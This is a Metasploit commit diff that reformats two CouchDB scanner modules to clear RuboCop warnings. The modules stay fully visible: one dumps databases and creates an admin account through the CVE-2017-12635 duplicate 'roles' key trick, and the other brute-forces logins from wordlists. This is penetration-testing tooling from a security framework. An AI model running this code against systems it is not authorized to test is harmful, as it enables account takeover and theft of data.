Land #20237, resolves RuboCop violations in auxiliary/scanner/couchdb

modules/auxiliary/scanner/couchdb: Resolve RuboCop violations

Author: msutovsky-r7

modules/auxiliary/scanner/couchdb/couchdb_enum.rb

@@ -8,27 +8,33 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Report
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'        => 'CouchDB Enum Utility',
-      'Description' => %q{
-        This module enumerates databases on CouchDB using the REST API
-        (without authentication by default).
-      },
-      'References'  =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'CouchDB Enum Utility',
+        'Description' => %q{
+          This module enumerates databases on CouchDB using the REST API
+          (without authentication by default).
+        },
+        'References' => [
           ['CVE', '2017-12635'],
           ['URL', 'https://justi.cz/security/2017/11/14/couchdb-rce-npm.html'],
           ['URL', 'https://wiki.apache.org/couchdb/HTTP_database_API']
         ],
-      'Author'      =>
-        [
+        'Author' => [
           'Max Justicz', # Vulnerability discovery
           'Roberto Soares Espreto <robertoespreto[at]gmail.com>', # Metasploit module
           'Hendrik Van Belleghem', # (@hendrikvb) Database dump enhancements
           'Green-m <greenm.xxoo[at]gmail.com>' # Portions from apache_couchdb_cmd_exec.rb used
         ],
-      'License'     => MSF_LICENSE
-    ))
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
+      )
+    )
 
     register_options(
       [
@@ -39,8 +45,8 @@ def initialize(info = {})
         OptString.new('HttpUsername', [true, 'CouchDB Username', Rex::Text.rand_text_alpha(12)]),
         OptString.new('HttpPassword', [true, 'CouchDB Password', Rex::Text.rand_text_alpha(12)]),
         OptString.new('ROLES', [true, 'CouchDB Roles', '_admin'])
-
-      ])
+      ]
+    )
   end
 
   def valid_response(res)
@@ -52,7 +58,7 @@ def get_version
 
     begin
       res = send_request_cgi(
-        'uri'    => '/',
+        'uri' => '/',
         'method' => 'GET'
       )
     rescue Rex::ConnectionError
@@ -88,8 +94,10 @@ def get_version
 
   def check
     return Exploit::CheckCode::Unknown unless get_version
+
     version = Rex::Version.new(@version)
     return Exploit::CheckCode::Unknown if version.version.empty?
+
     vprint_good("#{peer} - Found CouchDB version #{version}")
 
     return Exploit::CheckCode::Appears if version < Rex::Version.new('1.7.0') || version.between?(Rex::Version.new('2.0.0'), Rex::Version.new('2.1.0'))
@@ -100,13 +108,13 @@ def check
   def get_dbs(auth)
     begin
       res = send_request_cgi(
-        'uri'    => normalize_uri(target_uri.path),
+        'uri' => normalize_uri(target_uri.path),
         'method' => 'GET'
       )
 
       temp = JSON.parse(res.body)
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, JSON::ParserError => e
-      print_error("#{peer} - The following Error was encountered: #{e.class}")
+      print_error("#{peer} - The following error was encountered: #{e.class}")
       return
     end
 
@@ -118,7 +126,7 @@ def get_dbs(auth)
     print_status("#{peer} - Enumerating Databases...")
     results = JSON.pretty_generate(temp)
     print_good("#{peer} - Databases:\n\n#{results}\n")
-     path = store_loot(
+    path = store_loot(
       'couchdb.enum',
       'application/json',
       rhost,
@@ -130,39 +138,36 @@ def get_dbs(auth)
     res.get_json_document.each do |db|
       r = send_request_cgi(
         'uri' => normalize_uri(target_uri.path, "/#{db}/_all_docs"),
-        'method'=> 'GET',
+        'method' => 'GET',
         'authorization' => auth,
-        'vars_get' => {'include_docs' => 'true', 'attachments' => 'true'}
-       )
-       if r.code != 200
-         print_bad("#{peer} - Error retrieving database. Consider providing credentials or setting CREATEUSER and rerunning.")
-         return
-       end
-       temp = JSON.parse(r.body)
-       results = JSON.pretty_generate(temp)
-       path = store_loot(
-         "couchdb.#{db}",
-         "application/json",
-         rhost,
-         results,
-         "CouchDB Databases"
-       )
-       print_good("#{peer} - #{db} saved in: #{path}")
+        'vars_get' => { 'include_docs' => 'true', 'attachments' => 'true' }
+      )
+
+      if r.code != 200
+        print_bad("#{peer} - Error retrieving database. Consider providing credentials or setting CREATEUSER and rerunning.")
+        break
+      end
+
+      temp = JSON.parse(r.body)
+      results = JSON.pretty_generate(temp)
+      path = store_loot(
+        "couchdb.#{db}",
+        'application/json',
+        rhost,
+        results,
+        'CouchDB Databases'
+      )
+      print_good("#{peer} - #{db} saved in: #{path}")
     end
   end
 
-  def get_server_info(auth)
-    begin
-      res = send_request_cgi(
-        'uri'    => '/',
-        'method' => 'GET'
-      )
+  def get_server_info(_auth)
+    res = send_request_cgi(
+      'uri' => '/',
+      'method' => 'GET'
+    )
 
-      temp = JSON.parse(res.body)
-    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, JSON::ParserError => e
-      print_error("#{peer} - The following Error was encountered: #{e.class}")
-      return
-    end
+    temp = JSON.parse(res.body)
 
     unless valid_response(res)
       print_error("#{peer} - Unable to enum, received \"#{res.code}\"")
@@ -179,28 +184,31 @@ def get_server_info(auth)
       proto: 'tcp',
       info: res.body
     )
+  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, JSON::ParserError => e
+    print_error("#{peer} - The following error was encountered: #{e.class}")
   end
 
   def create_user
     username = datastore['HttpUsername']
     password = datastore['HttpPassword']
     roles = datastore['ROLES']
     timeout = datastore['TIMEOUT']
-    version = @version
 
-    data = %Q({
+    data = %({
 "type": "user",
 "name": "#{username}",
 "roles": ["#{roles}"],
 "roles": [],
 "password": "#{password}"
 })
     res = send_request_cgi(
-    { 'uri'    => "/_users/org.couchdb.user:#{username}", # http://hostname:port/_users/org.couchdb.user:username
-      'method' => 'PUT',
-      'ctype'  => 'text/json',
-      'data'   => data,
-    }, timeout)
+      {
+        'uri' => "/_users/org.couchdb.user:#{username}", # http://hostname:port/_users/org.couchdb.user:username
+        'method' => 'PUT',
+        'ctype' => 'text/json',
+        'data' => data
+      }, timeout
+    )
 
     unless res && res.code == 200
       print_error("#{peer} - Change Failed")
@@ -220,6 +228,7 @@ def run
       print_good("#{peer} - Found CouchDB version #{version}")
       create_user if version < Rex::Version.new('1.7.0') || version.between?(Rex::Version.new('2.0.0'), Rex::Version.new('2.1.0'))
     end
+
     auth = basic_auth(username, password) if username && password
     get_server_info(auth) if datastore['SERVERINFO']
     get_dbs(auth)

modules/auxiliary/scanner/couchdb/couchdb_login.rb

@@ -9,68 +9,80 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::AuthBrute
   include Msf::Auxiliary::Scanner
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => 'CouchDB Login Utility',
-      'Description'    => %{
-        This module tests CouchDB logins on a range of
-        machines and report successful logins.
-      },
-      'Author'         =>
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'CouchDB Login Utility',
+        'Description' => %q{
+          This module tests CouchDB logins on a range of
+          machines and report successful logins.
+        },
+        'Author' => [
           'espreto <robertoespreto[at]gmail.com>'
         ],
-      'License'        => MSF_LICENSE
-    ))
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, ACCOUNT_LOCKOUTS],
+          'Reliability' => []
+        }
+      )
+    )
 
     register_options(
       [
         Opt::RPORT(5984),
-        OptString.new('TARGETURI', [false, "TARGETURI for CouchDB. Default here is /", "/"]),
-        OptPath.new('USERPASS_FILE',  [ false, "File containing users and passwords separated by space, one pair per line",
-          File.join(Msf::Config.data_directory, "wordlists", "http_default_userpass.txt") ]),
-        OptPath.new('USER_FILE',  [ false, "File containing users, one per line",
-          File.join(Msf::Config.data_directory, "wordlists", "http_default_users.txt") ]),
-        OptPath.new('PASS_FILE',  [ false, "File containing passwords, one per line",
-          File.join(Msf::Config.data_directory, "wordlists", "http_default_pass.txt") ]),
-        OptBool.new('USER_AS_PASS', [ false, "Try the username as the password for all users", false]),
-      ])
+        OptString.new('TARGETURI', [false, 'TARGETURI for CouchDB. Default here is /', '/']),
+        OptPath.new('USERPASS_FILE', [
+          false, 'File containing users and passwords separated by space, one pair per line',
+          File.join(Msf::Config.data_directory, 'wordlists', 'http_default_userpass.txt')
+        ]),
+        OptPath.new('USER_FILE', [
+          false, 'File containing users, one per line',
+          File.join(Msf::Config.data_directory, 'wordlists', 'http_default_users.txt')
+        ]),
+        OptPath.new('PASS_FILE', [
+          false, 'File containing passwords, one per line',
+          File.join(Msf::Config.data_directory, 'wordlists', 'http_default_pass.txt')
+        ]),
+        OptBool.new('USER_AS_PASS', [ false, 'Try the username as the password for all users', false]),
+      ]
+    )
 
     deregister_options('HttpUsername', 'HttpPassword')
   end
 
-  def run_host(ip)
-
+  def run_host(_ip)
     user = datastore['HttpUsername'].to_s
     pass = datastore['HttpPassword'].to_s
 
     if user.nil? || user.strip == ''
-      each_user_pass do |user, pass|
-        do_login(user, pass)
+      each_user_pass do |u, p|
+        do_login(u, p)
       end
       return
     end
 
     vprint_status("#{rhost}:#{rport} - Trying to login with '#{user}' : '#{pass}'")
 
-      uri = target_uri.path
+    uri = target_uri.path
 
-      res = send_request_cgi({
-        'uri'    => normalize_uri(uri, '_users/_all_docs'),
-        'method' => 'GET',
-        'authorization' => basic_auth(user, pass)
-      })
-
-      return if res.nil?
-      return if (res.headers['Server'].nil? or res.headers['Server'] !~ /CouchDB/)
-      return if (res.code == 404)
+    res = send_request_cgi({
+      'uri' => normalize_uri(uri, '_users/_all_docs'),
+      'method' => 'GET',
+      'authorization' => basic_auth(user, pass)
+    })
 
-      if [200, 301, 302].include?(res.code)
-        vprint_good("#{rhost}:#{rport} - Successful login with '#{user}' : '#{pass}'")
-      end
+    return if res.nil?
+    return if res.headers['Server'].nil? || res.headers['Server'] !~ /CouchDB/
+    return if res.code == 404
 
-    rescue ::Rex::ConnectionError
-      vprint_error("'#{rhost}':'#{rport}' - Failed to connect to the web server")
+    if [200, 301, 302].include?(res.code)
+      vprint_good("#{rhost}:#{rport} - Successful login with '#{user}' : '#{pass}'")
+    end
+  rescue ::Rex::ConnectionError
+    vprint_error("'#{rhost}':'#{rport}' - Failed to connect to the web server")
   end
 
   def report_cred(opts)
@@ -131,7 +143,7 @@ def do_login(user, pass)
   rescue ::Rex::ConnectionError, ::Errno::ECONNREFUSED, ::Errno::ETIMEDOUT
     print_error('HTTP connection failed, aborting')
     return :abort
-  rescue => e
+  rescue StandardError => e
     print_error("Error: #{e}")
     return nil
   end